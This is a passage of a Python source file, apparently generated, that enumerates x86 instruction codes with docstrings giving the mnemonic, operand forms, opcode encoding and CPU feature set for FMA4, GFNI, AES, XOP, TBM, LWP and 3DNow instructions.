VEX_VFNMSUBPD_XMM_XMM_XMM_XMMM128: int = 4051
"""
``VFNMSUBPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 7D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPD_YMM_YMM_YMM_YMMM256: int = 4052
"""
``VFNMSUBPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 7D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBSS_XMM_XMM_XMMM32_XMM: int = 4053
"""
``VFNMSUBSS xmm1, xmm2, xmm3/m32, xmm4``
``VEX.LIG.66.0F3A.W0 7E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBSS_XMM_XMM_XMM_XMMM32: int = 4054
"""
``VFNMSUBSS xmm1, xmm2, xmm3, xmm4/m32``
``VEX.LIG.66.0F3A.W1 7E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBSD_XMM_XMM_XMMM64_XMM: int = 4055
"""
``VFNMSUBSD xmm1, xmm2, xmm3/m64, xmm4``
``VEX.LIG.66.0F3A.W0 7F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBSD_XMM_XMM_XMM_XMMM64: int = 4056
"""
``VFNMSUBSD xmm1, xmm2, xmm3, xmm4/m64``
``VEX.LIG.66.0F3A.W1 7F /r /is4``
``FMA4``
``16/32/64-bit``
"""
SHA1RNDS4_XMM_XMMM128_IMM8: int = 4057
"""
``SHA1RNDS4 xmm1, xmm2/m128, imm8``
``NP 0F 3A CC /r ib``
``SHA``
``16/32/64-bit``
"""
GF2P8AFFINEQB_XMM_XMMM128_IMM8: int = 4058
"""
``GF2P8AFFINEQB xmm1, xmm2/m128, imm8``
``66 0F 3A CE /r ib``
``GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8AFFINEQB_XMM_XMM_XMMM128_IMM8: int = 4059
"""
``VGF2P8AFFINEQB xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.W1 CE /r ib``
``AVX and GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8AFFINEQB_YMM_YMM_YMMM256_IMM8: int = 4060
"""
``VGF2P8AFFINEQB ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W1 CE /r ib``
``AVX and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEQB_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4061
"""
``VGF2P8AFFINEQB xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 CE /r ib``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEQB_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4062
"""
``VGF2P8AFFINEQB ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 CE /r ib``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEQB_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4063
"""
``VGF2P8AFFINEQB zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 CE /r ib``
``AVX512F and GFNI``
``16/32/64-bit``
"""
GF2P8AFFINEINVQB_XMM_XMMM128_IMM8: int = 4064
"""
``GF2P8AFFINEINVQB xmm1, xmm2/m128, imm8``
``66 0F 3A CF /r ib``
``GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8AFFINEINVQB_XMM_XMM_XMMM128_IMM8: int = 4065
"""
``VGF2P8AFFINEINVQB xmm1, xmm2, xmm3/m128, imm8``
``VEX.128.66.0F3A.W1 CF /r ib``
``AVX and GFNI``
``16/32/64-bit``
"""
VEX_VGF2P8AFFINEINVQB_YMM_YMM_YMMM256_IMM8: int = 4066
"""
``VGF2P8AFFINEINVQB ymm1, ymm2, ymm3/m256, imm8``
``VEX.256.66.0F3A.W1 CF /r ib``
``AVX and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEINVQB_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4067
"""
``VGF2P8AFFINEINVQB xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 CF /r ib``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEINVQB_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4068
"""
``VGF2P8AFFINEINVQB ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 CF /r ib``
``AVX512VL and GFNI``
``16/32/64-bit``
"""
EVEX_VGF2P8AFFINEINVQB_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4069
"""
``VGF2P8AFFINEINVQB zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 CF /r ib``
``AVX512F and GFNI``
``16/32/64-bit``
"""
AESKEYGENASSIST_XMM_XMMM128_IMM8: int = 4070
"""
``AESKEYGENASSIST xmm1, xmm2/m128, imm8``
``66 0F 3A DF /r ib``
``AES``
``16/32/64-bit``
"""
VEX_VAESKEYGENASSIST_XMM_XMMM128_IMM8: int = 4071
"""
``VAESKEYGENASSIST xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG DF /r ib``
``AES and AVX``
``16/32/64-bit``
"""
VEX_RORX_R32_RM32_IMM8: int = 4072
"""
``RORX r32, r/m32, imm8``
``VEX.LZ.F2.0F3A.W0 F0 /r ib``
``BMI2``
``16/32/64-bit``
"""
VEX_RORX_R64_RM64_IMM8: int = 4073
"""
``RORX r64, r/m64, imm8``
``VEX.LZ.F2.0F3A.W1 F0 /r ib``
``BMI2``
``64-bit``
"""
XOP_VPMACSSWW_XMM_XMM_XMMM128_XMM: int = 4074
"""
``VPMACSSWW xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 85 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSSWD_XMM_XMM_XMMM128_XMM: int = 4075
"""
``VPMACSSWD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 86 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSSDQL_XMM_XMM_XMMM128_XMM: int = 4076
"""
``VPMACSSDQL xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 87 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSSDD_XMM_XMM_XMMM128_XMM: int = 4077
"""
``VPMACSSDD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 8E /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSSDQH_XMM_XMM_XMMM128_XMM: int = 4078
"""
``VPMACSSDQH xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 8F /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSWW_XMM_XMM_XMMM128_XMM: int = 4079
"""
``VPMACSWW xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 95 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSWD_XMM_XMM_XMMM128_XMM: int = 4080
"""
``VPMACSWD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 96 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSDQL_XMM_XMM_XMMM128_XMM: int = 4081
"""
``VPMACSDQL xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 97 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSDD_XMM_XMM_XMMM128_XMM: int = 4082
"""
``VPMACSDD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 9E /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMACSDQH_XMM_XMM_XMMM128_XMM: int = 4083
"""
``VPMACSDQH xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 9F /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPCMOV_XMM_XMM_XMMM128_XMM: int = 4084
"""
``VPCMOV xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 A2 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPCMOV_YMM_YMM_YMMM256_YMM: int = 4085
"""
``VPCMOV ymm1, ymm2, ymm3/m256, ymm4``
``XOP.256.X8.W0 A2 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPCMOV_XMM_XMM_XMM_XMMM128: int = 4086
"""
``VPCMOV xmm1, xmm2, xmm3, xmm4/m128``
``XOP.128.X8.W1 A2 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPCMOV_YMM_YMM_YMM_YMMM256: int = 4087
"""
``VPCMOV ymm1, ymm2, ymm3, ymm4/m256``
``XOP.256.X8.W1 A2 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPPERM_XMM_XMM_XMMM128_XMM: int = 4088
"""
``VPPERM xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 A3 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPPERM_XMM_XMM_XMM_XMMM128: int = 4089
"""
``VPPERM xmm1, xmm2, xmm3, xmm4/m128``
``XOP.128.X8.W1 A3 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMADCSSWD_XMM_XMM_XMMM128_XMM: int = 4090
"""
``VPMADCSSWD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 A6 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPMADCSWD_XMM_XMM_XMMM128_XMM: int = 4091
"""
``VPMADCSWD xmm1, xmm2, xmm3/m128, xmm4``
``XOP.128.X8.W0 B6 /r /is4``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTB_XMM_XMMM128_IMM8: int = 4092
"""
``VPROTB xmm1, xmm2/m128, imm8``
``XOP.128.X8.W0 C0 /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTW_XMM_XMMM128_IMM8: int = 4093
"""
``VPROTW xmm1, xmm2/m128, imm8``
``XOP.128.X8.W0 C1 /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTD_XMM_XMMM128_IMM8: int = 4094
"""
``VPROTD xmm1, xmm2/m128, imm8``
``XOP.128.X8.W0 C2 /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTQ_XMM_XMMM128_IMM8: int = 4095
"""
``VPROTQ xmm1, xmm2/m128, imm8``
``XOP.128.X8.W0 C3 /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMB_XMM_XMM_XMMM128_IMM8: int = 4096
"""
``VPCOMB xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 CC /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMW_XMM_XMM_XMMM128_IMM8: int = 4097
"""
``VPCOMW xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 CD /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMD_XMM_XMM_XMMM128_IMM8: int = 4098
"""
``VPCOMD xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 CE /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMQ_XMM_XMM_XMMM128_IMM8: int = 4099
"""
``VPCOMQ xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 CF /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMUB_XMM_XMM_XMMM128_IMM8: int = 4100
"""
``VPCOMUB xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 EC /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMUW_XMM_XMM_XMMM128_IMM8: int = 4101
"""
``VPCOMUW xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 ED /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMUD_XMM_XMM_XMMM128_IMM8: int = 4102
"""
``VPCOMUD xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 EE /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_VPCOMUQ_XMM_XMM_XMMM128_IMM8: int = 4103
"""
``VPCOMUQ xmm1, xmm2, xmm3/m128, imm8``
``XOP.128.X8.W0 EF /r ib``
``XOP``
``16/32/64-bit``
"""
XOP_BLCFILL_R32_RM32: int = 4104
"""
``BLCFILL r32, r/m32``
``XOP.L0.X9.W0 01 /1``
``TBM``
``16/32/64-bit``
"""
XOP_BLCFILL_R64_RM64: int = 4105
"""
``BLCFILL r64, r/m64``
``XOP.L0.X9.W1 01 /1``
``TBM``
``64-bit``
"""
XOP_BLSFILL_R32_RM32: int = 4106
"""
``BLSFILL r32, r/m32``
``XOP.L0.X9.W0 01 /2``
``TBM``
``16/32/64-bit``
"""
XOP_BLSFILL_R64_RM64: int = 4107
"""
``BLSFILL r64, r/m64``
``XOP.L0.X9.W1 01 /2``
``TBM``
``64-bit``
"""
XOP_BLCS_R32_RM32: int = 4108
"""
``BLCS r32, r/m32``
``XOP.L0.X9.W0 01 /3``
``TBM``
``16/32/64-bit``
"""
XOP_BLCS_R64_RM64: int = 4109
"""
``BLCS r64, r/m64``
``XOP.L0.X9.W1 01 /3``
``TBM``
``64-bit``
"""
XOP_TZMSK_R32_RM32: int = 4110
"""
``TZMSK r32, r/m32``
``XOP.L0.X9.W0 01 /4``
``TBM``
``16/32/64-bit``
"""
XOP_TZMSK_R64_RM64: int = 4111
"""
``TZMSK r64, r/m64``
``XOP.L0.X9.W1 01 /4``
``TBM``
``64-bit``
"""
XOP_BLCIC_R32_RM32: int = 4112
"""
``BLCIC r32, r/m32``
``XOP.L0.X9.W0 01 /5``
``TBM``
``16/32/64-bit``
"""
XOP_BLCIC_R64_RM64: int = 4113
"""
``BLCIC r64, r/m64``
``XOP.L0.X9.W1 01 /5``
``TBM``
``64-bit``
"""
XOP_BLSIC_R32_RM32: int = 4114
"""
``BLSIC r32, r/m32``
``XOP.L0.X9.W0 01 /6``
``TBM``
``16/32/64-bit``
"""
XOP_BLSIC_R64_RM64: int = 4115
"""
``BLSIC r64, r/m64``
``XOP.L0.X9.W1 01 /6``
``TBM``
``64-bit``
"""
XOP_T1MSKC_R32_RM32: int = 4116
"""
``T1MSKC r32, r/m32``
``XOP.L0.X9.W0 01 /7``
``TBM``
``16/32/64-bit``
"""
XOP_T1MSKC_R64_RM64: int = 4117
"""
``T1MSKC r64, r/m64``
``XOP.L0.X9.W1 01 /7``
``TBM``
``64-bit``
"""
XOP_BLCMSK_R32_RM32: int = 4118
"""
``BLCMSK r32, r/m32``
``XOP.L0.X9.W0 02 /1``
``TBM``
``16/32/64-bit``
"""
XOP_BLCMSK_R64_RM64: int = 4119
"""
``BLCMSK r64, r/m64``
``XOP.L0.X9.W1 02 /1``
``TBM``
``64-bit``
"""
XOP_BLCI_R32_RM32: int = 4120
"""
``BLCI r32, r/m32``
``XOP.L0.X9.W0 02 /6``
``TBM``
``16/32/64-bit``
"""
XOP_BLCI_R64_RM64: int = 4121
"""
``BLCI r64, r/m64``
``XOP.L0.X9.W1 02 /6``
``TBM``
``64-bit``
"""
XOP_LLWPCB_R32: int = 4122
"""
``LLWPCB r32``
``XOP.L0.X9.W0 12 /0``
``LWP``
``16/32/64-bit``
"""
XOP_LLWPCB_R64: int = 4123
"""
``LLWPCB r64``
``XOP.L0.X9.W1 12 /0``
``LWP``
``64-bit``
"""
XOP_SLWPCB_R32: int = 4124
"""
``SLWPCB r32``
``XOP.L0.X9.W0 12 /1``
``LWP``
``16/32/64-bit``
"""
XOP_SLWPCB_R64: int = 4125
"""
``SLWPCB r64``
``XOP.L0.X9.W1 12 /1``
``LWP``
``64-bit``
"""
XOP_VFRCZPS_XMM_XMMM128: int = 4126
"""
``VFRCZPS xmm1, xmm2/m128``
``XOP.128.X9.W0 80 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZPS_YMM_YMMM256: int = 4127
"""
``VFRCZPS ymm1, ymm2/m256``
``XOP.256.X9.W0 80 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZPD_XMM_XMMM128: int = 4128
"""
``VFRCZPD xmm1, xmm2/m128``
``XOP.128.X9.W0 81 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZPD_YMM_YMMM256: int = 4129
"""
``VFRCZPD ymm1, ymm2/m256``
``XOP.256.X9.W0 81 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZSS_XMM_XMMM32: int = 4130
"""
``VFRCZSS xmm1, xmm2/m32``
``XOP.128.X9.W0 82 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VFRCZSD_XMM_XMMM64: int = 4131
"""
``VFRCZSD xmm1, xmm2/m64``
``XOP.128.X9.W0 83 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTB_XMM_XMMM128_XMM: int = 4132
"""
``VPROTB xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 90 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTB_XMM_XMM_XMMM128: int = 4133
"""
``VPROTB xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 90 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTW_XMM_XMMM128_XMM: int = 4134
"""
``VPROTW xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 91 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTW_XMM_XMM_XMMM128: int = 4135
"""
``VPROTW xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 91 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTD_XMM_XMMM128_XMM: int = 4136
"""
``VPROTD xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 92 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTD_XMM_XMM_XMMM128: int = 4137
"""
``VPROTD xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 92 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTQ_XMM_XMMM128_XMM: int = 4138
"""
``VPROTQ xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 93 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPROTQ_XMM_XMM_XMMM128: int = 4139
"""
``VPROTQ xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 93 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLB_XMM_XMMM128_XMM: int = 4140
"""
``VPSHLB xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 94 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLB_XMM_XMM_XMMM128: int = 4141
"""
``VPSHLB xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 94 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLW_XMM_XMMM128_XMM: int = 4142
"""
``VPSHLW xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 95 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLW_XMM_XMM_XMMM128: int = 4143
"""
``VPSHLW xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 95 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLD_XMM_XMMM128_XMM: int = 4144
"""
``VPSHLD xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 96 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLD_XMM_XMM_XMMM128: int = 4145
"""
``VPSHLD xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 96 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLQ_XMM_XMMM128_XMM: int = 4146
"""
``VPSHLQ xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 97 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHLQ_XMM_XMM_XMMM128: int = 4147
"""
``VPSHLQ xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 97 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAB_XMM_XMMM128_XMM: int = 4148
"""
``VPSHAB xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 98 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAB_XMM_XMM_XMMM128: int = 4149
"""
``VPSHAB xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 98 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAW_XMM_XMMM128_XMM: int = 4150
"""
``VPSHAW xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 99 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAW_XMM_XMM_XMMM128: int = 4151
"""
``VPSHAW xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 99 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAD_XMM_XMMM128_XMM: int = 4152
"""
``VPSHAD xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 9A /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAD_XMM_XMM_XMMM128: int = 4153
"""
``VPSHAD xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 9A /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAQ_XMM_XMMM128_XMM: int = 4154
"""
``VPSHAQ xmm1, xmm2/m128, xmm3``
``XOP.128.X9.W0 9B /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPSHAQ_XMM_XMM_XMMM128: int = 4155
"""
``VPSHAQ xmm1, xmm2, xmm3/m128``
``XOP.128.X9.W1 9B /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDBW_XMM_XMMM128: int = 4156
"""
``VPHADDBW xmm1, xmm2/m128``
``XOP.128.X9.W0 C1 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDBD_XMM_XMMM128: int = 4157
"""
``VPHADDBD xmm1, xmm2/m128``
``XOP.128.X9.W0 C2 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDBQ_XMM_XMMM128: int = 4158
"""
``VPHADDBQ xmm1, xmm2/m128``
``XOP.128.X9.W0 C3 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDWD_XMM_XMMM128: int = 4159
"""
``VPHADDWD xmm1, xmm2/m128``
``XOP.128.X9.W0 C6 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDWQ_XMM_XMMM128: int = 4160
"""
``VPHADDWQ xmm1, xmm2/m128``
``XOP.128.X9.W0 C7 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDDQ_XMM_XMMM128: int = 4161
"""
``VPHADDDQ xmm1, xmm2/m128``
``XOP.128.X9.W0 CB /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUBW_XMM_XMMM128: int = 4162
"""
``VPHADDUBW xmm1, xmm2/m128``
``XOP.128.X9.W0 D1 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUBD_XMM_XMMM128: int = 4163
"""
``VPHADDUBD xmm1, xmm2/m128``
``XOP.128.X9.W0 D2 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUBQ_XMM_XMMM128: int = 4164
"""
``VPHADDUBQ xmm1, xmm2/m128``
``XOP.128.X9.W0 D3 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUWD_XMM_XMMM128: int = 4165
"""
``VPHADDUWD xmm1, xmm2/m128``
``XOP.128.X9.W0 D6 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUWQ_XMM_XMMM128: int = 4166
"""
``VPHADDUWQ xmm1, xmm2/m128``
``XOP.128.X9.W0 D7 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHADDUDQ_XMM_XMMM128: int = 4167
"""
``VPHADDUDQ xmm1, xmm2/m128``
``XOP.128.X9.W0 DB /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHSUBBW_XMM_XMMM128: int = 4168
"""
``VPHSUBBW xmm1, xmm2/m128``
``XOP.128.X9.W0 E1 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHSUBWD_XMM_XMMM128: int = 4169
"""
``VPHSUBWD xmm1, xmm2/m128``
``XOP.128.X9.W0 E2 /r``
``XOP``
``16/32/64-bit``
"""
XOP_VPHSUBDQ_XMM_XMMM128: int = 4170
"""
``VPHSUBDQ xmm1, xmm2/m128``
``XOP.128.X9.W0 E3 /r``
``XOP``
``16/32/64-bit``
"""
XOP_BEXTR_R32_RM32_IMM32: int = 4171
"""
``BEXTR r32, r/m32, imm32``
``XOP.L0.XA.W0 10 /r id``
``TBM``
``16/32/64-bit``
"""
XOP_BEXTR_R64_RM64_IMM32: int = 4172
"""
``BEXTR r64, r/m64, imm32``
``XOP.L0.XA.W1 10 /r id``
``TBM``
``64-bit``
"""
XOP_LWPINS_R32_RM32_IMM32: int = 4173
"""
``LWPINS r32, r/m32, imm32``
``XOP.L0.XA.W0 12 /0 id``
``LWP``
``16/32/64-bit``
"""
XOP_LWPINS_R64_RM32_IMM32: int = 4174
"""
``LWPINS r64, r/m32, imm32``
``XOP.L0.XA.W1 12 /0 id``
``LWP``
``64-bit``
"""
XOP_LWPVAL_R32_RM32_IMM32: int = 4175
"""
``LWPVAL r32, r/m32, imm32``
``XOP.L0.XA.W0 12 /1 id``
``LWP``
``16/32/64-bit``
"""
XOP_LWPVAL_R64_RM32_IMM32: int = 4176
"""
``LWPVAL r64, r/m32, imm32``
``XOP.L0.XA.W1 12 /1 id``
``LWP``
``64-bit``
"""
D3NOW_PI2FW_MM_MMM64: int = 4177
"""
``PI2FW mm, mm/m64``
``0F 0F /r 0C``
``3DNOWEXT``
``16/32/64-bit``
"""
D3NOW_PI2FD_MM_MMM64: int = 4178
"""
``PI2FD mm, mm/m64``
``0F 0F /r 0D``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PF2IW_MM_MMM64: int = 4179
"""
``PF2IW mm, mm/m64``
``0F 0F /r 1C``
``3DNOWEXT``
``16/32/64-bit``
"""
D3NOW_PF2ID_MM_MMM64: int = 4180
"""
``PF2ID mm, mm/m64``
``0F 0F /r 1D``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRCPV_MM_MMM64: int = 4181
"""
``PFRCPV mm, mm/m64``
``0F 0F /r 86``
``AMD Geode GX/LX``
``16/32-bit``
"""
D3NOW_PFRSQRTV_MM_MMM64: int = 4182
"""
``PFRSQRTV mm, mm/m64``
``0F 0F /r 87``
``AMD Geode GX/LX``
``16/32-bit``
"""
D3NOW_PFNACC_MM_MMM64: int = 4183
"""
``PFNACC mm, mm/m64``
``0F 0F /r 8A``
``3DNOWEXT``
``16/32/64-bit``
"""
D3NOW_PFPNACC_MM_MMM64: int = 4184
"""
``PFPNACC mm, mm/m64``
``0F 0F /r 8E``
``3DNOWEXT``
``16/32/64-bit``
"""
D3NOW_PFCMPGE_MM_MMM64: int = 4185
"""
``PFCMPGE mm, mm/m64``
``0F 0F /r 90``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFMIN_MM_MMM64: int = 4186
"""
``PFMIN mm, mm/m64``
``0F 0F /r 94``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRCP_MM_MMM64: int = 4187
"""
``PFRCP mm, mm/m64``
``0F 0F /r 96``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRSQRT_MM_MMM64: int = 4188
"""
``PFRSQRT mm, mm/m64``
``0F 0F /r 97``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFSUB_MM_MMM64: int = 4189
"""
``PFSUB mm, mm/m64``
``0F 0F /r 9A``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFADD_MM_MMM64: int = 4190
"""
``PFADD mm, mm/m64``
``0F 0F /r 9E``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFCMPGT_MM_MMM64: int = 4191
"""
``PFCMPGT mm, mm/m64``
``0F 0F /r A0``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFMAX_MM_MMM64: int = 4192
"""
``PFMAX mm, mm/m64``
``0F 0F /r A4``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRCPIT1_MM_MMM64: int = 4193
"""
``PFRCPIT1 mm, mm/m64``
``0F 0F /r A6``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRSQIT1_MM_MMM64: int = 4194
"""
``PFRSQIT1 mm, mm/m64``
``0F 0F /r A7``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFSUBR_MM_MMM64: int = 4195
"""
``PFSUBR mm, mm/m64``
``0F 0F /r AA``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFACC_MM_MMM64: int = 4196
"""
``PFACC mm, mm/m64``
``0F 0F /r AE``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFCMPEQ_MM_MMM64: int = 4197
"""
``PFCMPEQ mm, mm/m64``
``0F 0F /r B0``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFMUL_MM_MMM64: int = 4198
"""
``PFMUL mm, mm/m64``
``0F 0F /r B4``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PFRCPIT2_MM_MMM64: int = 4199
"""
``PFRCPIT2 mm, mm/m64``
``0F 0F /r B6``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PMULHRW_MM_MMM64: int = 4200
"""
``PMULHRW mm, mm/m64``
``0F 0F /r B7``
``3DNOW``
``16/32/64-bit``
"""
D3NOW_PSWAPD_MM_MMM64: int = 4201
"""
``PSWAPD mm, mm/m64``
``0F 0F /r BB``
``3DNOWEXT``
``16/32/64-bit``
"""
